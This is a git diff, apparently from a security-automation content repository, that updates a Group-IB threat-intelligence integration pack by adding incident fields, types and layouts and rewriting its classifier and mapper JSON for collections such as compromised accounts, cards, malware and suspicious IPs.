Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Aliases.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_CVE.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Country.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Description.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Goals.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Labels.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Reports_Table.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Roles.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Countries.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Description.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Expertises.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Langs.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Regions.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Report_Number.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Sectors.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Nation-State_Cybercriminals_Threat_Title.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_OSI_Git_Repository_Files_Table.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_BIC.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_BSB.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_CLABE.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_IBAN.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_Name.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Organization_SWIFT.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Parsed_Login_Domain.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Parsed_Login_IP.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Passwords.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Brand.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Date_Added.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Date_Detected.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Date_Updated.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Domain_Expiration_Date.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Domain_Puny.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_IP_Table.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Email.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Path.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Source.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Table.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Objectives.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Registrar.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Sources.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_URLs.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Provider_Domain.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Proxy_Port.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Proxy_Source.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Proxy_Sources.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Proxy_Type.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Report_Number.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Reporter.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Scanner_Categories.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Scanner_Sources.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Service_Domain.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Service_IP.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Service_URL.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Socks_Proxy_Source.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_ASN.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_City.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Domain_Provider.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_IP.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Provider.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Target_Region.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Actor_Country.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Actors_Table.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Level.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Update_Time.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Upload_Time.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_VPN_Names.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_VPN_Sources.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Vulnerability_Type.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_APT_Threat.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Attacks_DDOS.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Attacks_Deface.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Attacks_Phishing_Group.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Attacks_Phishing_Kit.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Compromised_Account_Group.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Compromised_Card_Group.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Compromised_Mule.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Cybercriminal_Threat.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Cybercriminal_Threat_Actor.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Malware.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Malware_CNC.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Nation-State_Cybercriminals_Threat.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Nation-State_Cybercriminals_Threat_Actor.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_OSI_Vulnerability.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Suspicious_IP_Open_Proxy.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Suspicious_IP_Scanner.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Suspicious_IP_Socks_Proxy.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Suspicious_IP_TOR_Node.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Suspicious_IP_VPN.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Hash.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/test_data/avalible_collections_example.json delete mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/test_data/example.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/test_data/main_collections_examples.json delete mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/test_data/results.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/test_data/search_example.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/test_data/avalible_collections_example.json delete mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/test_data/example.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/test_data/main_collections_examples.json delete mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIB_TIA_Feed/test_data/results.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_APT_Threat_Layout.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Attacks_DDOS_Layout.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Attacks_Deface_Layout.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Attacks_Phishing_Group_Layout.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Attacks_Phishing_Kit_Layout.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Account_Group_Layout.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Card_Group_Layout.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Cybercriminal_Threat_Actor_Layout.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Cybercriminal_Threat_Layout.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Malware_CNC_Layout.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Malware_Layout.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Nation-State_Cybercriminals_Threat_Actor_Layout.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Nation-State_Cybercriminals_Threat_Layout.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_OSI_Vulnerability_Layout.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Suspicious_IP_Open_Proxy_Layout.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Suspicious_IP_Scanner_Layout.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Suspicious_IP_Socks_Proxy_Layout.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Suspicious_IP_TOR_Node_Layout.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Suspicious_IP_VPN_Layout.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/PreProcessRules/preprocessrule-4d9ca067-e506-4bcb-8ee5-fe5fb30e72d8-gib_rule.json create mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore b/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore index 795980bb46ba..09370649b2ec 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore @@ -17,38 +17,4 @@ ignore=IM111 ignore=BA101 [file:1_4_1.md] -ignore=RN116 - -# GR103 is temporary, see CIAC-11656 -[file:incidentfield-GIB_Screenshot.json] -ignore=GR103 -[file:incidentfield-GIB_Related_Indicators_Data.json] -ignore=GR103 -[file:incidentfield-GIB_Date_Expired.json] -ignore=GR103 -[file:incidentfield-GIB_Phishing_Status.json] -ignore=GR103 -[file:incidentfield-GIB_HTML.json] -ignore=GR103 -[file:incidentfield-GIB_Date_Created.json] -ignore=GR103 -[file:incidentfield-GIB_Address.json] -ignore=GR103 -[file:incidentfield-GIB_Phishing_Domain.json] -ignore=GR103 -[file:incidentfield-GIB_Phishing_Type.json] -ignore=GR103 -[file:incidentfield-GIB_Title.json] -ignore=GR103 -[file:classifier-Group-IB_Threat_Intelligence_mapper.json] -ignore=GR103 -[file:incidentfield-GIB_Name_Servers.json] -ignore=GR103 -[file:incidentfield-GIB_Email.json] -ignore=GR103 -[file:incidentfield-GIB_Person.json] -ignore=GR103 -[file:incidentfield-GIB_ID.json] -ignore=GR103 -[file:incidentfield-GIB_Favicon.json] -ignore=GR103 +ignore=RN116 \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/.secrets-ignore b/Packs/GroupIB_ThreatIntelligenceAttribution/.secrets-ignore index 4fabadf8858b..a00f6eefc97e 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/.secrets-ignore +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/.secrets-ignore @@ -1,5 +1,6 @@ 11.11.11.11 https://some.ru +https://some-url.com some.ru 109.70.100.46 some@gmail.ru @@ -14,4 +15,6 @@ password name TA Name provider -region \ No newline at end of file +region +gibextendedcvsstemporal +softwareMixed.softwareType \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Classifiers/classifier-Group-IB_Threat_Intelligence_classifier.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Classifiers/classifier-Group-IB_Threat_Intelligence_classifier.json index 781ceca06255..9fb6da364af8 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Classifiers/classifier-Group-IB_Threat_Intelligence_classifier.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Classifiers/classifier-Group-IB_Threat_Intelligence_classifier.json @@ -3,14 +3,28 @@ "feed": false, "id": "Group-IB Threat Intelligence (classifier)", "keyTypeMap": { - "bp/phishing": "GIB Brand Protection Phishing", - "bp/phishing_kit": "GIB Brand Protection Phishing Kit", - "compromised/account": "GIB Compromised Account", "compromised/breached": "GIB Data Breach", - "compromised/card": "GIB Compromised Card", - "malware/targeted_malware": "GIB Targeted Malware", "osi/git_repository": "GIB OSI Git Leak", - "osi/public_leak": "GIB OSI Public Leak" + "osi/public_leak": "GIB OSI Public Leak", + "compromised/account_group": "GIB Compromised Account Group", + "compromised/bank_card_group": "GIB Compromised Card Group", + "compromised/mule": "GIB Compromised Mule", + "suspicious_ip/vpn": "GIB Suspicious IP VPN", + "suspicious_ip/scanner": "GIB Suspicious IP Scanner", + "suspicious_ip/tor_node": "GIB Suspicious IP TOR Node", + "suspicious_ip/open_proxy": "GIB Suspicious IP Open Proxy", + "suspicious_ip/socks_proxy": "GIB Suspicious IP Socks Proxy", + "malware/malware": "GIB Malware", + "malware/cnc": "GIB Malware CNC", + "attacks/ddos": "GIB Attacks DDOS", + "attacks/deface": "GIB Attacks Deface", + "attacks/phishing_kit": "GIB Attacks Phishing Kit", + "attacks/phishing_group": "GIB Attacks Phishing Group", + "hi/threat": "GIB Cybercriminal Threat", + "hi/threat_actor": "GIB Cybercriminal Threat Actor", + "apt/threat_actor": "GIB Nation-State Cybercriminals Threat Actor", + "apt/threat": "GIB Nation-State Cybercriminals Threat", + "osi/vulnerability": "GIB OSI Vulnerability" }, "name": "Group-IB Threat Intelligence (classifier)", "transformer": { diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Classifiers/classifier-Group-IB_Threat_Intelligence_mapper.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Classifiers/classifier-Group-IB_Threat_Intelligence_mapper.json index dd6f40f59968..739e5738f257 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Classifiers/classifier-Group-IB_Threat_Intelligence_mapper.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Classifiers/classifier-Group-IB_Threat_Intelligence_mapper.json @@ -3,334 +3,167 @@ "feed": false, "id": "Group-IB Threat Intelligence (mapper)", "mapping": { - "GIB Brand Protection Domain": { + "GIB Compromised Account": { "dontMapEventToLabels": true, "internalMapping": { "GIB Address": { "complex": { "accessor": "address", "filters": [], - "root": "attrs", - "transformers": [] - }, - "simple": "" - }, - "GIB Date Created": { - "complex": { - "accessor": "date_registered", - "filters": [], - "root": "attrs", - "transformers": [ - { - "args": { - "add_utc_timezone": { - "isContext": false, - "value": null - }, - "dayfirst": { - "isContext": false, - "value": { - "complex": null, - "simple": "\"False\"" - } - }, - "fuzzy": { - "isContext": false, - "value": null - }, - "yearfirst": { - "isContext": false, - "value": { - "complex": null, - "simple": "\"True\"" - } - } - }, - "operator": "DateStringToISOFormat" - } - ] - }, - "simple": "" - }, - "GIB Date Expired": { - "complex": { - "accessor": "date_expired", - "filters": [], - "root": "attrs", - "transformers": [ - { - "args": { - "add_utc_timezone": { - "isContext": false, - "value": null - }, - "dayfirst": { - "isContext": false, - "value": { - "complex": null, - "simple": "\"False\"" - } - }, - "fuzzy": { - "isContext": false, - "value": null - }, - "yearfirst": { - "isContext": false, - "value": { - "complex": null, - "simple": "\"True\"" - } - } - }, - "operator": "DateStringToISOFormat" - } - ] - }, - "simple": "" - }, - "GIB Email": { - "complex": { - "accessor": "email", - "filters": [], - "root": "attrs", + "root": "person", "transformers": [] - }, - "simple": "" + } }, - "GIB Favicon": { + "GIB Compromised Login": { "complex": { - "accessor": "favicon", "filters": [], - "root": "attrs", + "root": "login", "transformers": [] - }, - "simple": "" + } }, - "GIB HTML": { + "GIB Date Compromised": { "complex": { - "accessor": "html", "filters": [], - "root": "attrs", + "root": "dateCompromised", "transformers": [] - }, - "simple": "" + } }, - "GIB ID": { + "GIB Date of Detection": { "complex": { - "accessor": "", "filters": [], - "root": "id", + "root": "dateDetected", "transformers": [] - }, - "simple": "" - }, - "GIB Name Servers": { - "complex": { - "accessor": "name_server", - "filters": [], - "root": "attrs", - "transformers": [ - { - "args": { - "separator": { - "isContext": false, - "value": { - "complex": null, - "simple": ", " - } - } - }, - "operator": "join" - } - ] - }, - "simple": "" + } }, - "GIB Person": { + "GIB Drop Email": { "complex": { - "accessor": "person", + "accessor": "email", "filters": [], - "root": "attrs", + "root": "dropEmail", "transformers": [] - }, - "simple": "" + } }, - "GIB Phishing Domain": { + "GIB Drop Email Domain": { "complex": { "accessor": "domain", "filters": [], - "root": "attrs", - "transformers": [] - }, - "simple": "" - }, - "GIB Phishing Status": { - "complex": { - "accessor": "status", - "filters": [], - "root": "attrs", - "transformers": [] - }, - "simple": "" - }, - "GIB Phishing Type": { - "complex": { - "accessor": "type", - "filters": [], - "root": "attrs", + "root": "dropEmail", "transformers": [] - }, - "simple": "" + } }, - "GIB Related Indicators Data": { + "GIB Email": { "complex": { - "accessor": "", + "accessor": "email", "filters": [], - "root": "relatedIndicatorsData", + "root": "person", "transformers": [] - }, - "simple": "" + } }, - "GIB Screenshot": { + "GIB ID": { "complex": { - "accessor": "screenshot", "filters": [], - "root": "attrs", + "root": "id", "transformers": [] - }, - "simple": "" + } }, - "GIB Title": { + "GIB Malware Name": { "complex": { - "accessor": "page_title", + "accessor": "name", "filters": [], - "root": "attrs", + "root": "malware", "transformers": [] - }, - "simple": "" + } }, - "Phone Number": { - "complex": { - "accessor": "phone", - "filters": [], - "root": "attrs", - "transformers": [] - }, - "simple": "" - } - } - }, - "GIB Brand Protection Phishing": { - "dontMapEventToLabels": true, - "internalMapping": { - "GIB Date of Detection": { + "GIB Password": { "complex": { - "accessor": "", "filters": [], - "root": "dateDetected", + "root": "password", "transformers": [] - }, - "simple": "" + } }, - "GIB ID": { + "GIB Person": { "complex": { - "accessor": "", + "accessor": "name", "filters": [], - "root": "id", + "root": "person", "transformers": [] - }, - "simple": "" + } }, - "GIB Phishing Date Blocked": { + "GIB Portal Link": { "complex": { - "accessor": "", "filters": [], - "root": "dateBlocked", + "root": "portalLink", "transformers": [] - }, - "simple": "" + } }, - "GIB Phishing Status": { + "GIB Related Indicators Data": { "complex": { - "accessor": "", "filters": [], - "root": "status", + "root": "relatedIndicatorsData", "transformers": [] - }, - "simple": "" + } }, - "GIB Portal Link": { + "GIB Severity": { "complex": { - "accessor": "", + "accessor": "severity", "filters": [], - "root": "portalLink", + "root": "evaluation", "transformers": [] - }, - "simple": "" + } }, - "GIB Related Indicators Data": { + "GIB Source": { "complex": { - "accessor": "", "filters": [], - "root": "relatedIndicatorsData", + "root": "sourceType", "transformers": [] - }, - "simple": "" + } }, - "GIB Severity": { + "GIB Threat Actor ID": { "complex": { - "accessor": "severity", + "accessor": "id", "filters": [], - "root": "evaluation", + "root": "threatActor", "transformers": [] - }, - "simple": "" + } }, - "GIB Target Brand": { + "GIB Threat Actor Name": { "complex": { - "accessor": "", + "accessor": "name", "filters": [], - "root": "targetBrand", + "root": "threatActor", "transformers": [] - }, - "simple": "" + } }, - "GIB Target Category": { + "GIB Threat Actor is APT": { "complex": { - "accessor": "", + "accessor": "isAPT", "filters": [], - "root": "targetCategory", + "root": "threatActor", "transformers": [] - }, - "simple": "" + } }, - "GIB Target Domain": { + "GIB Victim IP": { "complex": { - "accessor": "", + "accessor": "ip", "filters": [], - "root": "targetDomain", + "root": "client.ipv4", "transformers": [] - }, - "simple": "" + } }, - "GIB Title": { + "Phone Number": { "complex": { - "accessor": "title", + "accessor": "phone", "filters": [], - "root": "phishingDomain", + "root": "person", "transformers": [] - }, - "simple": "" + } }, "severity": { "complex": { - "accessor": "", "filters": [], "root": "systemSeverity", "transformers": [] - }, - "simple": "" + } }, "GIB Admiralty Code": { "complex": { @@ -338,8 +171,7 @@ "filters": [], "root": "evaluation", "transformers": [] - }, - "simple": "" + } }, "GIB Credibility": { "complex": { @@ -347,8 +179,7 @@ "filters": [], "root": "evaluation", "transformers": [] - }, - "simple": "" + } }, "GIB Reliability": { "complex": { @@ -356,216 +187,89 @@ "filters": [], "root": "evaluation", "transformers": [] - }, - "simple": "" + } } } }, - "GIB Brand Protection Phishing Kit": { + "GIB Compromised Card": { "dontMapEventToLabels": true, "internalMapping": { - "GIB Date Created": { - "complex": { - "accessor": "", - "filters": [], - "root": "dateFirstSeen", - "transformers": [] - }, - "simple": "" - }, - "GIB Date of Detection": { - "complex": { - "accessor": "", - "filters": [], - "root": "dateDetected", - "transformers": [] - }, - "simple": "" - }, - "GIB Downloaded From": { - "complex": { - "accessor": "", - "filters": [], - "root": "downloadedFrom", - "transformers": [] - }, - "simple": "" - }, - "GIB ID": { - "complex": { - "accessor": "", - "filters": [], - "root": "id", - "transformers": [] - }, - "simple": "" - }, - "GIB Phishing Kit Emails": { - "complex": { - "accessor": "", - "filters": [], - "root": "emails", - "transformers": [] - }, - "simple": "" - }, - "GIB Phishing Kit Hash": { - "complex": { - "accessor": "", - "filters": [], - "root": "hash", - "transformers": [] - }, - "simple": "" - }, - "GIB Portal Link": { - "complex": { - "accessor": "", - "filters": [], - "root": "portalLink", - "transformers": [] - }, - "simple": "" - }, - "GIB Related Indicators Data": { - "complex": { - "accessor": "", - "filters": [], - "root": "relatedIndicatorsData", - "transformers": [] - }, - "simple": "" - }, - "GIB Severity": { - "complex": { - "accessor": "severity", - "filters": [], - "root": "evaluation", - "transformers": [] - }, - "simple": "" - }, - "GIB Target Brand": { + "GIB Address": { "complex": { - "accessor": "", + "accessor": "address", "filters": [], - "root": "targetBrand", + "root": "owner", "transformers": [] - }, - "simple": "" + } }, - "severity": { + "GIB CVV": { "complex": { - "accessor": "", + "accessor": "cvv", "filters": [], - "root": "systemSeverity", + "root": "cardInfo", "transformers": [] - }, - "simple": "" + } }, - "GIB Admiralty Code": { + "GIB Card Issuer": { "complex": { - "accessor": "admiraltyCode", + "accessor": "issuer", "filters": [], - "root": "evaluation", + "root": "cardInfo.issuer", "transformers": [] - }, - "simple": "" + } }, - "GIB Credibility": { + "GIB Card Number": { "complex": { - "accessor": "credibility", + "accessor": "number", "filters": [], - "root": "evaluation", + "root": "cardInfo", "transformers": [] - }, - "simple": "" + } }, - "GIB Reliability": { - "complex": { - "accessor": "reliability", - "filters": [], - "root": "evaluation", - "transformers": [] - }, - "simple": "" - } - } - }, - "GIB Compromised Account": { - "dontMapEventToLabels": true, - "internalMapping": { - "GIB Address": { + "GIB Card Type": { "complex": { - "accessor": "address", + "accessor": "type", "filters": [], - "root": "person", + "root": "cardInfo", "transformers": [] - }, - "simple": "" + } }, - "GIB Compromised Login": { + "GIB Card Valid Thru": { "complex": { - "accessor": "", + "accessor": "validThru", "filters": [], - "root": "login", + "root": "cardInfo", "transformers": [] - }, - "simple": "" + } }, "GIB Date Compromised": { "complex": { - "accessor": "", "filters": [], "root": "dateCompromised", "transformers": [] - }, - "simple": "" + } }, "GIB Date of Detection": { "complex": { - "accessor": "", "filters": [], "root": "dateDetected", "transformers": [] - }, - "simple": "" - }, - "GIB Drop Email": { - "complex": { - "accessor": "email", - "filters": [], - "root": "dropEmail", - "transformers": [] - }, - "simple": "" - }, - "GIB Drop Email Domain": { - "complex": { - "accessor": "domain", - "filters": [], - "root": "dropEmail", - "transformers": [] - }, - "simple": "" + } }, "GIB Email": { "complex": { "accessor": "email", "filters": [], - "root": "person", + "root": "owner", "transformers": [] - }, - "simple": "" + } }, "GIB ID": { "complex": { - "accessor": "", "filters": [], "root": "id", "transformers": [] - }, - "simple": "" + } }, "GIB Malware Name": { "complex": { @@ -573,44 +277,37 @@ "filters": [], "root": "malware", "transformers": [] - }, - "simple": "" + } }, - "GIB Password": { + "GIB Payment System": { "complex": { - "accessor": "", + "accessor": "system", "filters": [], - "root": "password", + "root": "cardInfo", "transformers": [] - }, - "simple": "" + } }, "GIB Person": { "complex": { "accessor": "name", "filters": [], - "root": "person", + "root": "owner", "transformers": [] - }, - "simple": "" + } }, "GIB Portal Link": { "complex": { - "accessor": "", "filters": [], "root": "portalLink", "transformers": [] - }, - "simple": "" + } }, "GIB Related Indicators Data": { "complex": { - "accessor": "", "filters": [], "root": "relatedIndicatorsData", "transformers": [] - }, - "simple": "" + } }, "GIB Severity": { "complex": { @@ 